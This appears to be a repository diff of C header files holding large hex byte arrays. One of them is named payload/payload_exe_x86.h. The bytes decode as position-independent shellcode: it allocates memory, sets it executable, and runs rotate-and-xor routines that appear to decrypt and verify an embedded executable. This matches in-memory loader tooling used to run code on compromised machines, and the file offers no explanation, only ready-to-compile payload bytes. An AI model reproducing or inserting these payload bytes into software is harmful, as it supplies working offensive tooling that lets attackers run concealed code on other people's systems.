1156 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1157 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1158 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48,
1159 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1160 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00,
1161 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1162 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1163 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1164 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1165 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49,
1166 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1,
1167 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1168 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4,
1169 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1170 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00,
1171 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1172 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1173 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48,
1174 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1175 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00,
1176 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1177 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0,
1178 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
1179 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55,
1180 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d,
1181 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48,
1182 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b,
1183 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0,
1184 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55,
1185 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1186 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7,
1187 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3,
1188 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45,
1189 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1190 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00,
1191 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1192 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3,
1193 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10,
1194 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10,
1195 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
1196 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8,
1197 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1198 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1199 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1200 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1201 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff,
1202 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2,
1203 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1204 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48,
1205 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d,
1206 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40,
1207 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1208 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b,
1209 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff,
1210 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1211 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c,
1212 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45,
1213 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1214 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1215 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1216 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe,
1217 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2,
1218 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1219 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10,
1220 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1221 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1222 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
1223 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48,
1224 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00,
1225 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b,
1226 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d,
1227 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40,
1228 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
1229 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c,
1230 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb,
1231 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10,
1232 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50,
1233 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b,
1234 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1235 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1236 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1237 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b,
1238 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48,
1239 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45,
1240 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0,
1241 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1242 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89,
1243 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b,
1244 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f,
1245 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00,
1246 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48,
1247 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff,
1248 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16,
1249 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30,
1250 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e,
1251 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
1252 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1253 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
1254 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
1255 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc,
1256 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03,
1257 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b,
1258 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2,
1259 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1,
1260 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc,
1261 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08,
1262 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45,
1263 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec,
1264 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b,
1265 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
1266 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1267 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1268 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45,
1269 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0,
1270 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
1271 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b,
1272 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1273 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10,
1274 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0,
1275 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00,
1276 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45,
1277 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b,
1278 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8,
1279 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
1280 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
1281 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0,
1282 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83,
1283 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0,
1284 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88,
1285 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83,
1286 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45,
1287 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45,
1288 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00,
1289 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83,
1290 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
1291 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1292 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1293 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8,
1294 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc,
1295 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
1296 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00,
1297 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b,
1298 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1299 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83,
1300 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc,
1301 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1302 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b,
1303 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45,
1304 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
1305 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
1306 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1307 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a,
1308 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca,
1309 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b,
1310 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1,
1311 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31,
1312 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48,
1313 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55,
1314 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48,
1315 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b,
1316 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b,
1317 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c,
1318 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0,
1319 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89,
1320 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55,
1321 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07,
1322 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca,
1323 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b,
1324 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89,
1325 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda,
1326 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42,
1327 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
1328 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c,
1329 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca,
1330 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00,
1331 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca,
1332 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8,
1333 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1334 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1335 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48,
1336 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9,
1337 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb,
1338 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1339 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54,
1340 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd,
1341 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
1342 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d,
1343 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45,
1344 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63,
1345 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48,
1346 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08,
1347 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8,
1348 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4,
1349 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b,
1350 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10,
1351 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d,
1352 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1353 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02,
1354 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5,
1355 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90,
1356 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
1357 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1358 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1359 0x00, 0x00, 0x00, 0x00};
1360
+638
-0
payload/payload_exe_x86.h less more
0
1 unsigned char PAYLOAD_EXE_X86[] = {
2 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff,
3 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57,
4 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77,
5 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00,
6 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6,
7 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02,
8 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a,
9 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00,
10 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20,
11 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00,
12 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00,
13 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8,
14 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00,
15 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4,
16 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00,
17 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00,
18 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76,
19 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46,
20 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39,
